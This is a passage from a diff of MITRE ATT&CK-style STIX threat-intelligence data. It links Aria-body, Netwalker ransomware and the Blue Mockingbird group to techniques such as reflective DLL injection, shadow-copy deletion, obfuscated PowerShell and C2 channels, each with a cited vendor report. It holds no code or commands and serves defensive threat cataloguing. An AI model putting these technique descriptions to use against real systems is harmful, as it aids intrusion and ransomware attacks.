+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather metadata from a file and to search for file and directory names.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--cbc2cb80-8f07-46dd-b167-3f237e39f39d",
+ "type": "relationship",
+ "modified": "2020-05-27T13:35:36.771Z",
+ "created": "2020-05-26T20:36:16.477Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fd8fa359-c13e-4641-9c3e-d03218daee0c",
+ "type": "relationship",
+ "modified": "2020-05-26T20:37:19.548Z",
+ "created": "2020-05-26T20:37:19.548Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--19c0c01d-5f43-4a4d-8385-0862f6b1bf78",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.146Z",
+ "created": "2020-05-26T21:02:38.352Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--67e2417b-793a-4082-94ca-445718e925b1",
+ "type": "relationship",
+ "modified": "2020-05-26T21:02:38.359Z",
+ "created": "2020-05-26T21:02:38.359Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can terminate system processes and services, some of which relate to backup software.(Citation: TrendMicro Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e6a3f7bf-33c3-4d4c-bb27-46bd2842c750",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.211Z",
+ "created": "2020-05-26T21:02:38.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can add the following registry entry: HKEY_CURRENT_USER\\SOFTWARE\\{8 random characters}.(Citation: TrendMicro Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0775a1ba-c95a-472e-ab1c-d21108acc907",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.216Z",
+ "created": "2020-05-26T21:02:38.430Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can use WMI to delete Shadow Volumes.(Citation: TrendMicro Netwalker May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e50b989c-9ad6-44c6-8eb7-b44af742cc40",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.243Z",
+ "created": "2020-05-26T21:02:38.432Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables. [Netwalker](https://attack.mitre.org/software/S0457)'s DLL has also been embedded within the PowerShell script in hex format.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--87282f36-42f5-4eb1-9fec-778bc0f846b7",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.246Z",
+ "created": "2020-05-26T21:02:38.494Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can delete the infected system's Shadow Volumes to prevent recovery.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--87343ae5-53c9-426c-abab-602c8041dafe",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.279Z",
+ "created": "2020-05-26T21:02:38.497Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can use Windows API functions to inject the ransomware DLL.(Citation: TrendMicro Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--aa045472-7c41-49c5-af44-4df9cf1fa073",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.282Z",
+ "created": "2020-05-26T21:02:38.500Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can determine the system architecture it is running on to choose which version of the DLL to use.(Citation: TrendMicro Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1c3bc7ec-cabe-4c8f-9d6e-99afd877e845",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.276Z",
+ "created": "2020-05-26T21:02:38.507Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "The [Netwalker](https://attack.mitre.org/software/S0457) DLL has been injected reflectively into the memory of a legitimate running process.(Citation: TrendMicro Netwalker May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f1091b2c-ea09-402b-9717-8b7526fb5c13",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.281Z",
+ "created": "2020-05-26T21:02:38.804Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can encrypt files on infected machines to extort victims.(Citation: TrendMicro Netwalker May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b9a67332-54a8-4531-948f-51e3ae2a0399",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.321Z",
+ "created": "2020-05-26T21:02:38.815Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) has been written in PowerShell and executed directly in memory, avoiding detection.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--998ad8ac-9929-4360-92c8-63efb1a81d78",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.347Z",
+ "created": "2020-05-26T21:02:38.816Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the username on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--549c2737-1097-4a16-8d4b-01ad0e3e689f",
+ "type": "relationship",
+ "modified": "2020-05-27T13:22:06.702Z",
+ "created": "2020-05-27T13:22:06.702Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has used TCP in C2 communications.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0997f41a-0232-4331-8a11-11a6433d8343",
+ "type": "relationship",
+ "modified": "2020-05-27T13:22:06.763Z",
+ "created": "2020-05-27T13:22:06.763Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the location, public IP address, and domain name on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a24f6ef-80e2-48b9-8f00-36ca4f59f191",
+ "type": "relationship",
+ "modified": "2020-05-27T13:22:06.766Z",
+ "created": "2020-05-27T13:22:06.766Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has used HTTP in C2 communications.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--49badb38-7e44-4dd6-85b2-91bb281385a0",
+ "type": "relationship",
+ "modified": "2020-05-27T13:22:06.772Z",
+ "created": "2020-05-27T13:22:06.772Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to collect data from USB devices.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2995ea85-ccdb-4378-bc35-3c62ccf5fa9d",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.351Z",
+ "created": "2020-05-27T13:22:06.779Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a reverse SOCKS proxy module.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c7f1b492-eea7-45d1-ab78-6794c7560c67",
+ "type": "relationship",
+ "modified": "2020-07-03T21:52:44.922Z",
+ "created": "2020-05-27T13:22:06.775Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5fdd0fba-8d1d-411a-b47b-3e5aae512892",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.348Z",
+ "created": "2020-05-27T13:22:06.780Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to duplicate a token from ntprint.exe.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a5848e5c-0a64-44f2-9432-4d503baea628",
+ "type": "relationship",
+ "modified": "2020-06-03T20:11:27.728Z",
+ "created": "2020-05-27T13:35:36.629Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to execute a process using runas.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--48e9217d-e93d-440f-9fa1-93116e5792bd",
+ "type": "relationship",
+ "modified": "2020-05-27T13:35:36.707Z",
+ "created": "2020-05-27T13:35:36.707Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the titles of running windows on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5ab058a1-4c88-481f-a7a8-77855ee916e6",
+ "type": "relationship",
+ "modified": "2020-05-27T13:35:36.714Z",
+ "created": "2020-05-27T13:35:36.714Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has used ZIP to compress data gathered on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fa77baa1-a258-4059-aa84-6822fe023d70",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.323Z",
+ "created": "2020-05-27T13:35:36.729Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Scheduled Tasks to establish persistence on local and remote hosts.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3f221ccc-1be7-4959-b239-6a3e027da1ae",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.706Z",
+ "created": "2020-05-27T15:31:09.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used batch script files to automate execution and deployment of payloads.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--552215a4-9761-4dce-8a59-83cd81ca43a8",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.803Z",
+ "created": "2020-05-27T15:31:09.471Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
